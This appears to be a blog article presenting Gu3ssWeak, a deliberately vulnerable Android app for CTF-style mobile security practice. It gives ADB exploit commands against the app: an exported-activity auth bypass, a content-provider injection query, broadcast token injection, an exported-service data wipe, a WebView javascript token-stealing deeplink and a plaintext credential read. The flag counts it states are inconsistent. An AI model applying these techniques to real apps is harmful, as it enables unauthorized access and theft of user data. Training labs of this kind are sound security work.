# Gu3ssWeak: A Deliberately Vulnerable Android App for Security Research

> Discover the Gu3ssWeak Android app, a deliberately vulnerable tool designed for mobile security research, bug bounty practice, and CTF-style learning.

- Canonical URL: https://coreiten.com/en/article/gu3ssweak-android-app-vulnerable-tool-for-security-research
- Language: en
- Section: Best Apps
- Author: Sami
- Published: 2026-10-10T12:03:52+03:00
- Modified: 2026-10-10T12:03:52+03:00
- Publisher: CoreITen (https://coreiten.com)
- Keywords: Gu3ssWeak, Android, OWASP Mobile Top 10, ADB, Gradle, WebView

## Summary

Gu3ssWeak is a deliberately vulnerable Android application created for security researchers and CTF players to practice mobile exploitation skills.

- The application contains 21 documented vulnerabilities that are mapped directly to the OWASP Mobile Top 10.
- Users can capture 20 flags in total, with instructions noting that 18 flags must be captured to unlock a master flag.
- The project repository provides specific ADB commands like launching an exported admin panel without permissions.
- Documentation files such as ARCHITECTURE.md and MITIGATIONS.md explain internal mechanics and remediation guidance.

**Why it matters:** It gives mobile security enthusiasts a hands-on, authorized sandbox to safely test and learn how to exploit and fix common Android vulnerabilities.

---

Security researchers and bug bounty hunters have a new tool for practicing their skills. The Gu3ssWeak Android app is a deliberately vulnerable application designed for mobile security research and Capture The Flag (CTF) style learning. The app contains 21 documented vulnerabilities that are mapped directly to the OWASP Mobile Top 10.

### Installation and Setup

To get started with Gu3ssWeak, users can clone the repository and build the application using Gradle. The following commands compile the debug build and install the APK via the Android Debug Bridge (ADB):

```bash
git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk
```

### CTF Gameplay and Flags

Once launched, the app opens directly to a lab list. Users can select a lab and attempt to exploit the vulnerability using the user interface, ADB, or a combination of both. Each successful exploit automatically captures its corresponding flag.

Users can then tap **Submit Flag** to confirm their progress or view the in-app **CTF Scoreboard**. The application features 20 flags in total, plus a master flag that is awarded for capturing all of them. However, the instructions also note that users must capture all 18 flags to unlock this master flag.

### Documentation and Mitigation

The project includes several resources to help users understand and fix the vulnerabilities:

- [ARCHITECTURE.md](https://github.com/b4sith-sec/gu3ssweak/blob/main/ARCHITECTURE.md) explains the internal workings of each vulnerable component.
- [MITIGATIONS.md](https://github.com/b4sith-sec/gu3ssweak/blob/main/MITIGATIONS.md) provides remediation guidance and fixes for every vulnerability, including concepts for escalating Local File Inclusion (LFI) to Remote Code Execution (RCE).
- [SECURITY.md](https://github.com/b4sith-sec/gu3ssweak/blob/main/SECURITY.md) outlines the security policy and responsible disclosure guidelines.
- [CHECKSUMS.txt](https://github.com/b4sith-sec/gu3ssweak/blob/main/CHECKSUMS.txt) contains the SHA256 checksums for the built APKs.

### Example Exploits and Commands

The source provides several ADB commands to demonstrate how to interact with the app's vulnerabilities. For example, users can access an exported admin panel that requires no permissions:

```bash
# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity
```

```bash
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true
```

Other commands demonstrate various attack vectors, including:

- Token injection via broadcast
- Data wipe via exported service
- Deeplink to WebView RCE chain
- Read plaintext stored credentials
- Watch for logged secrets

```bash
adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""

# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker

# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data

# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"

# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml

# Watch for logged secrets
adb logcat | grep Gu3ssWeak
```

### Educational Purpose and Disclaimer

Gu3ssWeak is intended purely for educational purposes. All vulnerabilities within the app are intentional and documented. While the techniques demonstrated apply to real applications, the project stresses that users should only test systems they own or are explicitly authorized to test. Users are advised to consult the SECURITY.md file for the full disclaimer and guidance on responsible disclosure.

## Sources

- [kitploit.com](https://kitploit.com/en/tools/github/b4sith-sec/gu3ssweak)
